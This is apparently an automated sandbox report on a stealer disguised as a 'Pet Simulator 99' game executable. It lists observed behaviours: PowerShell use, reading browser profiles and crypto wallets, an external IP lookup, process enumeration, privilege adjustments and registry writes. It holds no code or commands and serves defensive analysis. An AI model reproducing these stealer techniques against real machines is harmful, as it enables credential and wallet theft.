Malware Analysis Report

2025-05-05 21:18

Sample ID: 240510-tr6vcshf36
Target: [🚪BACKROOMS] Pet Simulator 99!.exe
SHA256: b984e378befd8a00559bb9f7d58015ea781615f47172a1c0ccfd4fad3cb2b9a2
Tags: pyinstaller, execution, spyware, stealer
Score: 8/10

Analysis Overview

Score: 8/10

SHA256: b984e378befd8a00559bb9f7d58015ea781615f47172a1c0ccfd4fad3cb2b9a2

Threat Level: Likely malicious

The file [🚪BACKROOMS] Pet Simulator 99!.exe was found to be: Likely malicious.

Malicious Activity Summary

Tags: pyinstaller, execution, spyware, stealer

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Loads dropped DLL

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Unsigned PE

Detects Pyinstaller

Suspicious use of SetWindowsHookEx

Detects videocard installed

Suspicious use of AdjustPrivilegeToken

Gathers system information

Enumerates processes with tasklist

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Enumerates system info in registry

Analysis: static1

Detonation Overview

Reported: 2024-05-10 16:18

Signatures

Detects Pyinstaller

Tag: pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-05-10 16:18

Reported: 2024-05-10 16:29

Platform: win11-20240508-en

Max time kernel: 250s

Max time network: 251s

Command Line

"C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe"

Signatures

Command and Scripting Interpreter: PowerShell

Tag: execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe N/A

Reads user/profile data of web browsers

Tags: spyware, stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

Tag: spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133598319601591199" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "5" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "2" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\NodeSlot = "7" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000008f67f23258a1da018b03b39a5ba1da015d19dfd2f6a2da0114000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\NodeSlot = "6" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
